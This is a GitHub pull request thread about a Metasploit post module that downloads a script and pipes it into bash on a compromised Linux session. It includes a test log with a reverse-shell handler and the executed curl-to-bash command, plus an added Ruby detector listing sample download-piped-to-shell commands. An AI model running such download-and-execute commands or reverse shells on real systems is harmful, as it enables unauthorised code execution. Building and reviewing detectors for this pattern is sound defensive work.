Post linux manage download exec #1596

Merged
merged 1 commit into from Mar 20, 2013

jabra-
Contributor

@jabra- jabra- commented Mar 14, 2013

Linux post module to download and run a file

@@ -80,6 +80,10 @@ def cmd_exec(cmd, args=nil, time_out=15)
return o
end

def vcmd_exec(cmd, args=nil, time_out=15)
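
Review bot: the added `def vcmd_exec(cmd, args=nil, time_out=15)` repeats the signature of `cmd_exec` directly above it, and nothing shown in the hunk says how the two differ. Add a short doc comment above the `def` stating what the wrapper prints and what it returns, so that callers of the mixin can tell which of the two methods to use.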
Contributor

I must admit I don't see a real benefit in defining this method in the mixin. And I don't like the idea of combining presentation helpers with logic in the same mixin. Maybe it would be a good idea to add this helper into your modules atm.

But yeah! It's just my opinion :) So I'm going to ask someone else to share an opinion about this point!

Contributor Author

This was done so I wouldn't need to have like 10 modules all with the same method just copied and pasted ...

On Thu, Mar 14, 2013 at 6:06 PM, Juan Vazquez notifications@github.com wrote:

In lib/msf/core/post/common.rb:

@@ -80,6 +80,10 @@ def cmd_exec(cmd, args=nil, time_out=15)
return o
end

  • def vcmd_exec(cmd, args=nil, time_out=15)

I must admit I don't see a real benefit in defining this method in the
mixin. And I don't like the idea of combining presentation helpers with
logic in the same mixin. Maybe it would be a good idea to add this helper
into your modules atm.

But yeah! It's just my opinion :) So I'm going to ask someone else to
share an opinion about this point!



@jabra-
Contributor Author

jabra- commented Mar 14, 2013

added auto-detection of bash and curl from the PATH.

@jvazquez-r7
Contributor

Hi @jasbro,

After discussing with @jlee-r7, we're going to ask you to avoid merging vcmd_exec into the Common Post mixin, because this way it merges a presentation helper into a "logic" mixin.

On the other hand, as pointed out by @jlee-r7, it doesn't seem the best idea to vprint_status the command before running it. As he also pointed out, when there are commands without output, vprinting empty outputs can annoy the user.

I guess it would be a good idea to include the helper in your modules atm, following the recommendations above. Sure, it would help to accelerate the review :)

Thanks very much in advance! And if you have any questions, don't hesitate to ask!

@jvazquez-r7
Contributor

Working as expected with shell sessions:

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (36 bytes) to 192.168.1.159
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.159:48138) at 2013-03-20 16:44:49 +0100

msf exploit(handler) > use post/linux/manage/download_exec
msf post(download_exec) > show options

Module options (post/linux/manage/download_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   URL                       yes       Full URL of file to download.

msf post(download_exec) > set SESSION 1
SESSION => 1
msf post(download_exec) > set url http://localhost/test.sh
url => http://localhost/test.sh
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > sessions -i 1
[*] Starting interaction with 1...

1730827770
lrMxozAifMwvqjccHHmsjOvzwrVuAQGd
aDiCHMssYpPGXcFChzjDdguTqNyAJKZw
UnAonWqkQUxQSdcCPKfhzynIczTNroXD
cat /var/www/test.sh
#!/bin/bash

touch /tmp/pwned.txt
echo "hola" > /tmp/pwned.txt
cat /tmp/pwned.txt
hola
^C
Abort session 1? [y/N]  y

[*] 192.168.1.159 - Command shell session 1 closed.  Reason: User exit
msf post(download_exec) > 

But I've noticed that when curl isn't available on the $PATH it just exits silently. Because of this I've tried to solve it with https://github.com/jasbro/metasploit-framework/pull/2, which tries to check if curl is in the path before proceeding. I think it is valuable, but please feel free to review, and if you agree with the changes just land it, and this PR will be updated automatically :)
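
For defenders reviewing shell history or process audit records, the command line printed in the session log above is a recognisable "download piped to a shell" pattern, including the `which` indirection. The following is an added example, not part of this pull request or of Metasploit; the function names, the `files.example` host and every sample command except the first are assumptions constructed for illustration.

```ruby
# Added example (not Metasploit code). Sample commands are constructed, except
# the first, which is the command the module printed in the session above.
DOWNLOADERS  = %w[curl wget].freeze
INTERPRETERS = %w[sh bash dash zsh ksh].freeze
WRAPPERS     = %w[sudo env nohup].freeze # assumption: used without options

# Name of the program a pipeline stage runs. Resolves /usr/bin/curl,
# `which curl` and $(command -v curl) to "curl".
def stage_program(stage)
  tokens = stage.scan(/`[^`]*`|\$\([^)]*\)|\S+/)
  head = tokens.drop_while { |t| WRAPPERS.include?(t) }.first
  return nil if head.nil?

  lookup = head.match(/\A(?:`|\$\()\s*(?:which|command\s+-v)\s+([^\s`)]+)/)
  File.basename(lookup ? lookup[1] : head)
end

# True when a downloader's output reaches a shell interpreter later in the
# same pipeline. Splits on a single "|" only, so "||" is not treated as a
# pipe. The split is naive: a "|" inside quotes is not recognised.
def download_piped_to_shell?(cmdline)
  programs = cmdline.split(/(?<!\|)\|(?!\|)/).map { |s| stage_program(s) }
  first_dl = programs.index { |p| DOWNLOADERS.include?(p) }
  return false if first_dl.nil?

  programs.drop(first_dl + 1).any? { |p| INTERPRETERS.include?(p) }
end

SAMPLE_COMMANDS = [
  '`which curl` http://localhost/test.sh 2>/dev/null | `which bash` ',
  '$(command -v wget) -qO- http://files.example/i.sh | /bin/sh',
  '/usr/bin/curl -fsSL http://files.example/i.sh | sudo bash',
  'curl -s http://files.example/data.json | jq .',
  'curl -o /tmp/i.sh http://files.example/i.sh || echo failed',
  'cat notes.txt | grep curl'
].freeze

# Commands from the list that match the pattern.
def flagged(commands)
  commands.select { |c| download_piped_to_shell?(c) }
end

puts flagged(SAMPLE_COMMANDS)
```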

@jvazquez-r7
Contributor

Thanks for landing it, merging!
